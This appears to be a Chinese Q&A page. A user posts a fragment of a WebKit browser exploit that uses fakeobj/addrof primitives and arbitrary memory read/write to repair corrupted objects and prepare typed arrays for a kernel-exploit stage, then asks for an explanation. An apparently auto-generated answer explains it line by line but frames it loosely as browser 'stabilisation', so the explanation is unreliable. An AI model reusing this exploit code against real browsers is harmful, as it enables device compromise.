(function () { var magic = boot_fakeobj(boot_addrof(obj) + 16); magic[4] = addrof_slave; magic[5] = (addrof_slave - addrof_slave % 0x100000000) / 0x100000000; obj.buffer = obj_master; magic[4] = addrof_obj_slave; magic[5] = (addrof_obj_slave - addrof_obj_slave % 0x100000000) / 0x100000000; magic = null; })(); //fix fucked objects to stabilize webkit (function () { //fix fontfaceset (memmoved 96 bytes to low, move back) var ffs_addr = read_ptr_at(addrof(post_ffs) + 8) - 208; write_mem(ffs_addr, read_mem(ffs_addr - 96, 208)); //fix strings (restore "valid") header for (var i = 0; i < needfix.length; i++) { var addr = read_ptr_at(addrof(needfix[i]) + 8); write_ptr_at(addr, (HASHMAP_BUCKET - 20) * 0x100000000 + 1); write_ptr_at(addr + 8, addr + 20); write_ptr_at(addr + 16, 0x80000014); } //fix array butterfly write_ptr_at(butterfly + 248, 0x1f0000001f); })(); //^ @sleirs' stuff. anything pre arb rw is magic, I'm happy I don't have to deal with that. //create compat stuff for kexploit.js var expl_master = new Uint32Array(8); var expl_slave = new Uint32Array(2); var addrof_expl_slave = addrof(expl_slave); var m = fakeobj(addrof(obj) + 16); obj.buffer = expl_slave; m[7] = 1; obj.buffer = expl_master; m[4] = addrof_expl_slave; m[5] = (addrof_expl_slave - addrof_expl_slave % 0x100000000) / 0x100000000; m[7] = 1;请解释以上代码及功能?
时间: 2024-04-18 07:33:32 浏览: 127
keil集成bin文件生成_boot+app合并_dfu生成.zip
这段代码的目的是进行一些修复操作,以稳定浏览器,并创建一些兼容性的对象。
首先,定义了一个匿名函数,并在其中执行一系列操作。首先,通过调用`boot_addrof`函数获取到`obj`对象的地址,并将其加上偏移量16,然后通过调用`boot_fakeobj`函数将其转换为一个对象,并将其赋值给变量`magic`。
接下来,将`addrof_slave`和`addrof_obj_slave`的值分别赋给`magic[4]`和`magic[5]`,以将地址存储在`magic`对象中的`addrof_slave`和`addrof_obj_slave`位置。
然后,将`obj_master`赋值给`obj.buffer`,并将`addrof_obj_slave`的值分别赋给`magic[4]`和`magic[5]`。
最后,将变量`magic`置为null,释放其引用。
接下来,定义了另一个匿名函数,并在其中进行修复操作。首先,通过调用`read_ptr_at(addrof(post_ffs) + 8)`获取到一个地址,并将其减去208赋值给变量`ffs_addr`。然后,通过调用`read_mem(ffs_addr - 96, 208)`读取一段内存,并通过调用`write_mem(ffs_addr, read_mem(ffs_addr - 96, 208))`将其写入到之前计算出的地址中,以修复`FontFaceSet`对象。
接着,通过循环遍历`needfix`数组中的字符串,获取其地址,并依次修复其header。
最后,通过调用`write_ptr_at(butterfly + 248, 0x1f0000001f)`修复数组的butterfly。
接下来,创建了一些对象和数组,用于兼容性处理。
首先,创建了一个名为`expl_master`的长度为8的Uint32Array数组,以及一个名为`expl_slave`的长度为2的Uint32Array数组。然后,通过调用`addrof`函数获取到`expl_slave`的地址,并将其赋值给变量`addrof_expl_slave`。
接着,通过调用`fakeobj`函数将`addrof(obj) + 16`的结果转换为一个对象,并将其赋值给变量`m`。然后,将`expl_slave`赋值给`obj.buffer`,将1赋值给`m[7]`。
接下来,将`expl_master`赋值给`obj.buffer`,将`addrof_expl_slave`的值分别赋给`m[4]`和`m[5]`,并将1赋值给`m[7]`。
这段代码的目的是进行一些修复操作,以稳定浏览器,并创建一些兼容性的对象。其中包括修复`FontFaceSet`对象、修复字符串的header、修复数组的butterfly,并创建一些与之前进行攻击相关的对象和数组。
阅读全文